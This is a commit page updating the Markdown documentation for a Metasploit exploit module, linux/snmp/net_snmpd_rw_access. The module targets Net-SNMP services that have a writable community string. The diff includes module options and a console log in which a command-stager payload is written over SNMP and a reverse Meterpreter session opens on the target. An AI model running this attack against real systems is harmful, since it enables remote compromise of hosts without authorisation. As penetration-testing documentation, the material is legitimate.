adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Documentation update

Browse Source
This commit is contained in:
Steve
2018-02-14 16:58:14 +00:00
parent 734a6496c5
commit 5f6ecd2ff9
1 changed files with 44 additions and 18 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/snmp/net_snmpd_rw_access.md
+44 -18
View File
@@ -15,13 +15,24 @@
8. You should get a session
## Options
This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.
'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
'COMMUNITY' is a read/write community string of the target Net-SNMP service.
'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'.
'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
'TIMEOUT' specifies the maximum time to allow SNMP to timeout.
**FILEPATH**
The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
**COMMUNITY**
The read/write community string of the target Net-SNMP service.
**VERSION**
The SNMP protocol version. Accepted values are '1' or '2c'.
**CHUNKSIZE**
The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors.
Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/]
**TIMEOUT**
Specifies the maximum time to allow SNMP to timeout.
## Scenario
```
@@ -63,9 +74,15 @@
FILEPATH /tmp yes file path to write to
RETRIES 1 yes SNMP Retries
RHOST 192.168.1.3 yes The target address
RPORT 161 yes The target port (UDP)
RPORT 161 yes The target port (TCP)
SHELL /bin/bash yes Shell to call with -c argument
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TIMEOUT 1 yes SNMP Timeout
VERSION 2c yes SNMP Version <1/2c>
URIPATH no The URI to use for this exploit (default is random)
VERSION 2c yes SNMP Version <1/2c>
Payload information:
Space: 4096
@@ -79,16 +96,25 @@
https://www.intelisecure.com
msf exploit(linux/snmp/net_snmpd_rw_access) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Writing to NET-SNMP-EXTEND-MIB with given payload
[*] Payload generated. Sending in 200 byte chunk increments.
[*] Sent chunked executable. Now executing payload
[*] Sending stage (849108 bytes) to 192.168.1.3
[+] SNMP request timeout (this is promising).
[*] Command Stager progress - 1.11% done (199/17924 bytes)
[*] Command Stager progress - 2.23% done (399/17924 bytes)
[*] Command Stager progress - 3.34% done (598/17924 bytes)
[*] Command Stager progress - 4.45% done (797/17924 bytes)
... Redacted ...
[*] Command Stager progress - 98.64% done (17681/17924 bytes)
[*] Command Stager progress - 99.72% done (17873/17924 bytes)
[*] Sending stage (857352 bytes) to 192.168.1.3
[*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000
[-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding
[*] Exploit completed, but no session was created.
msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30
[*] Starting interaction with 30...
meterpreter > getuid
Server username: uid=121, gid=129, euid=121, egid=129
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.3 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit
```